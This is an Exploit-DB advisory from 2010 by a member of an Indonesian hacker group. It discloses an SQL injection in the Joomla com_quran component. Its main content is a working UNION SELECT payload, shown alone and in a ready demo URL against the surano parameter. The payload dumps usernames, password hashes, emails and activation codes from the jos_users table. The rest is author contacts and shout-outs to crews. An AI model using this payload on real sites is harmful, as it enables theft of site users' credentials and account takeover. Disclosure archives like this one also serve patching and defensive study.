Joomla! Component com_quran - SQL Injection

EDB-ID:

12812

CVE:

N/A


Author:

r3m1ck

Type:

webapps


Platform:

PHP

Date:

2010-05-30


[!] ===========================================================================[!]

[~] Joomla com_quran SQL Injection vulnerability
[~] Author : r3m1ck (mick.emo.boy@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com , http://r3m1ck.us
[~] Date : 31 May, 2010
[~] location : Indonesia
[~] Software download : http://muslimonline.org/forum/index.php?automodule=downloads&req=idx&cmd=viewdetail&f_id=2

[!]===========================================================================[!]



[ Vulnerable File ]

http://site/index.php/component/quran/index.php?option=com_quran&action=viewayat&surano=[INDONESIANCODER]

[ XpL ]

-69/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,
activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users--

or

another columns

[ d3m0 ]

http://site/joomla/index.php/component/quran/index.php?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,
activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users--

etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM U3D Crew IndonesianHacker ARUMBIA TEAM
[+] tukulesto,M3NW5,arianom,kaMtiEz,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,Pathloader,cimpli,MarahMerah,IBL13Z
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,MISTERFRIBO
[+] bumble_be,pL4nkt0n,yur4kh4,god~of~cats,eLisHa

[ NOTE ]

[+] Happy birthday to INDONESIAN CODER TEAM... sukses selaluuu !!! muach muach :-*
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] cayang icha miss u muach muach... :-*
[+] kaMtiEz : hai cah suraaammmmm ,, wkwkwkwk ojok suram wae lah,, :p
[+] Ibl13z : baru pertama naek kereta om?? =))

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] U3D Crew still r4wX...
[+] ./e0f